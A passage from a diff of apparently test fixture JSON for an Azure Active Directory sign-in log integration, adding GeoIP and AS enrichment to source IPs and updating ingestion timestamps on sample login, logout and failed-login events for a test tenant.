Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"17d02385-1e30-45b7-949c-4d3dd549a0e7\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"361dd87e-3bc9-4f0a-b236-ed7365e28d00\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4639,6 +5107,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -4707,7 +5187,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970279Z", + "ingested": "2021-12-14T14:49:08.047438434Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:39:45\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e3346dd0-ecf6-4676-8765-365c7370b6fe\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"32b4cec1-00eb-44ea-be73-adc82387db00\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4744,6 +5224,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -4825,7 +5317,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970283500Z", + "ingested": "2021-12-14T14:49:08.047439118Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"c44b4083-3bb0-49c1-b47d-974e53cbdf3c\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:40:16\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"FlowTokenScenario\",\"Value\":\"Login\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"1\"},{\"Name\":\"RequestType\",\"Value\":\"Login:login\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"a772fd76-847f-4703-90f1-37eb81c9f392\",\"InterSystemsId\":\"6fee997e-1b2a-4a95-a8be-ea85642ed652\",\"IntraSystemId\":\"a063e495-5883-4837-8186-582817fdd500\",\"LogonError\":\"UserStrongAuthClientAuthNRequiredInterrupt\",\"ModifiedProperties\":[],\"ObjectId\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Operation\":\"UserLoginFailed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Failed\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"797f4846-ba00-4fd7-ba43-dac1f8f63013\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4865,6 +5357,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.14" }, "tags": [ @@ -4945,7 +5449,7 @@ "ip": "67.43.156.14" }, "event": { - "ingested": "2021-12-09T13:42:12.970288400Z", + "ingested": "2021-12-14T14:49:08.047439724Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.14\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.14\",\"CreationTime\":\"2020-02-08T14:33:52\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"487e4f43-53db-4d6f-a314-5355746d4853\",\"InterSystemsId\":\"7766ac63-ae7f-43e6-868a-a5422a96fd8b\",\"IntraSystemId\":\"adc9d69c-8ae6-41c7-b685-331453060a00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -4985,6 +5489,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -5065,7 +5581,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970293300Z", + "ingested": "2021-12-14T14:49:08.047440305Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:53:24\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"41f6b2dc-4db6-444c-93d9-829a842b87e2\",\"InterSystemsId\":\"781c1055-e731-48ee-a806-c3f39ba160e3\",\"IntraSystemId\":\"e7fe21ea-ec03-46dd-b272-0a72ebbeac00\",\"ModifiedProperties\":[],\"ObjectId\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"5f09333a-842c-47da-a157-57da27fcbca5\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5105,6 +5621,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5185,7 +5713,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970297Z", + "ingested": "2021-12-14T14:49:08.047440992Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:22\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ec9fa29b-6201-456d-b228-ca1759e0bf6c\",\"InterSystemsId\":\"82b07417-7b33-4531-952f-d3f719e2356a\",\"IntraSystemId\":\"280b3410-9d51-4ce3-952d-5bba0bea6600\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5225,6 +5753,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5293,7 +5833,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970301400Z", + "ingested": "2021-12-14T14:49:08.047441667Z", "original": "{\"Actor\":[{\"ID\":\"Unknown\",\"Type\":0}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-06T09:28:04\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Logout\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"}],\"Id\":\"e988fd90-2eff-4ad7-9f02-030a9d73ad6e\",\"InterSystemsId\":\"8571fe85-eb4a-430d-b468-97900e344923\",\"IntraSystemId\":\"d239e473-6687-4ff9-ac65-0e3c59961600\",\"LogonError\":\"None\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"Unknown\",\"UserKey\":\"Not Available\",\"UserType\":5,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5330,6 +5870,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -5410,7 +5962,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970307100Z", + "ingested": "2021-12-14T14:49:08.047442392Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:35\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"3cbf15a5-84d0-4b0e-ba8e-c3ed43477293\",\"InterSystemsId\":\"8d662bc0-0011-424d-a7dc-56bfc5a142b4\",\"IntraSystemId\":\"d0a4e1ed-206d-4602-aaae-406a02c5c300\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5450,6 +6002,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5530,7 +6094,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970311Z", + "ingested": "2021-12-14T14:49:08.047442960Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"00000002-0000-0ff1-ce00-000000000000\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Success\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"d2bb7eae-bc6e-42d2-b270-a885ec626235\",\"InterSystemsId\":\"9270f20a-56f2-493e-b6a7-a859adcaf626\",\"IntraSystemId\":\"97aa710f-536f-44c8-a8d5-711dc55f5500\",\"ModifiedProperties\":[],\"ObjectId\":\"00000002-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000002-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5570,6 +6134,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -5650,7 +6226,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970314900Z", + "ingested": "2021-12-14T14:49:08.047443525Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T10:51:49\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"03de6d95-b955-451c-8311-473b6853d774\",\"InterSystemsId\":\"97c52753-c410-438f-89e2-22741e5ccc6a\",\"IntraSystemId\":\"c9ef5d5f-e3af-4669-b465-921d8b58bd00\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5690,6 +6266,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5770,7 +6358,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970318100Z", + "ingested": "2021-12-14T14:49:08.047444111Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"e48d4214-364e-4731-b2b6-47dabf529218\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-07T16:43:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"True\"}],\"Id\":\"ac8fcffb-7c44-498d-ad6b-24b85a3a1b59\",\"InterSystemsId\":\"9e0a494b-0db0-4481-a70e-eea6124b7018\",\"IntraSystemId\":\"e7a84bcf-41ff-4953-8e99-fb1820685f00\",\"ModifiedProperties\":[],\"ObjectId\":\"00000004-0000-0ff1-ce00-000000000000\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"00000004-0000-0ff1-ce00-000000000000\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5810,6 +6398,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -5890,7 +6490,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:12.970322400Z", + "ingested": "2021-12-14T14:49:08.047444589Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:13:36\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"},{\"Name\":\"UserAuthenticationMethod\",\"Value\":\"9\"},{\"Name\":\"RequestType\",\"Value\":\"OAuth2:Authorize\"},{\"Name\":\"ResultStatusDetail\",\"Value\":\"Redirect\"},{\"Name\":\"KeepMeSignedIn\",\"Value\":\"False\"}],\"Id\":\"880fb7bc-5708-42d1-86a8-760c32ac5e6b\",\"InterSystemsId\":\"9fc4af4c-bf19-4f88-92ac-0fd029ca21bd\",\"IntraSystemId\":\"56fa424b-64bd-4ea5-abc4-38256f8a5600\",\"ModifiedProperties\":[],\"ObjectId\":\"Unknown\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":15,\"ResultStatus\":\"Succeeded\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -5930,6 +6530,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -6010,7 +6622,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:12.970327900Z", + "ingested": "2021-12-14T14:49:08.047445419Z", "original": "{\"Actor\":[{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":0},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.13\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.13\",\"CreationTime\":\"2020-02-12T21:38:37\",\"ExtendedProperties\":[{\"Name\":\"UserAgent\",\"Value\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 